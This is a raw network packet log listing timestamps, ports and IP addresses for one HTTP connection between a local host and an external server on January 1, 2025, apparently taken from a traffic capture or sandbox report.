Jan 1, 2025 08:54:02.466859102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466869116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466881037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466892004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466909885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466909885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466957092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466999054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467147112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467156887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467168093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467179060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467190027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467200041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467200994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467210054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467221975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467227936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467232943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467241049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467246056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467257977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467305899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467305899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467305899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467715025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467726946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467736959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467746973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467757940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467767954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467780113 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467780113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467792034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467799902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467803955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467816114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467819929 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467828035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.467845917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.467878103 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468275070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468286037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468302965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468312979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468324900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468332052 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468332052 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468336105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468352079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468362093 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468364954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468375921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468385935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468395948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468399048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468406916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468416929 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468417883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468429089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468431950 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468441010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468451023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468461990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468472958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468473911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468488932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468498945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.468508959 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.468540907 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469269991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469281912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469297886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469307899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469319105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469325066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469330072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469341040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469352007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469361067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469369888 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469369888 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469371080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469384909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469396114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469398975 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469407082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469419003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469429016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469439983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469440937 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469451904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469463110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469471931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469480991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469480991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469485044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.469500065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.469522953 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470235109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470246077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470256090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470266104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470278025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470288992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470294952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470299959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470309019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470313072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470324039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470333099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470341921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470347881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470347881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470351934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470364094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470379114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470385075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470392942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470402956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470411062 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470416069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470438004 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470467091 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.470931053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470941067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470952034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470957041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470967054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470978022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470987082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.470999002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.471008062 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.471016884 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.471030951 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.471065998 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557013035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557038069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557049036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557131052 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557159901 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557172060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557184935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557276011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557286024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557300091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557377100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557472944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557483912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557496071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557507992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557518005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557528973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557542086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557542086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557590961 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557709932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557720900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557730913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557742119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557753086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557790995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557790995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557841063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557852983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557894945 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.557970047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557981968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.557991028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558001995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558012009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558022976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558032990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558043957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558044910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558044910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558054924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558084011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558084011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558110952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558451891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558463097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558473110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558484077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558494091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558504105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558540106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558541059 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558552027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558562994 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558579922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558594942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558604002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558645010 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558645010 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558840036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558851004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558867931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558877945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558890104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558901072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558911085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558923006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558923960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558923960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558933973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558944941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558958054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.558990002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.558990002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559420109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559431076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559441090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559451103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559462070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559473038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559483051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559493065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559503078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559503078 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559503078 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559514999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559529066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559556007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559844017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559854984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559865952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559875965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559885979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559896946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559900045 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559909105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559919119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559931993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559931993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559937000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559948921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559961081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559968948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.559971094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559983015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.559993982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560002089 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560003042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560003996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560015917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560026884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560038090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560053110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560064077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560084105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560084105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560127974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560861111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560873032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560882092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560892105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560902119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560911894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560921907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560928106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560928106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560933113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560944080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560954094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560965061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560969114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.560976028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560986996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560997009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.560997963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561008930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561019897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561029911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561029911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561031103 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561036110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561086893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561086893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561763048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561774015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561783075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561791897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561801910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561811924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561821938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561831951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561835051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561835051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561842918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561855078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561863899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561875105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561881065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561881065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561886072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561892033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561901093 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561902046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561913967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.561952114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.561952114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648034096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648047924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648058891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648096085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648102999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648113966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648124933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648169041 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648183107 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648257017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648267031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648277044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648287058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648298025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648330927 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648468971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648479939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648489952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648499966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648540020 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648576975 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648616076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648633003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648643970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648668051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648714066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648765087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648775101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648789883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648806095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648814917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648823977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648834944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648844957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.648858070 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648858070 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.648896933 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.649094105 CET	80	49730	147.45.44.131	192.168.2.4
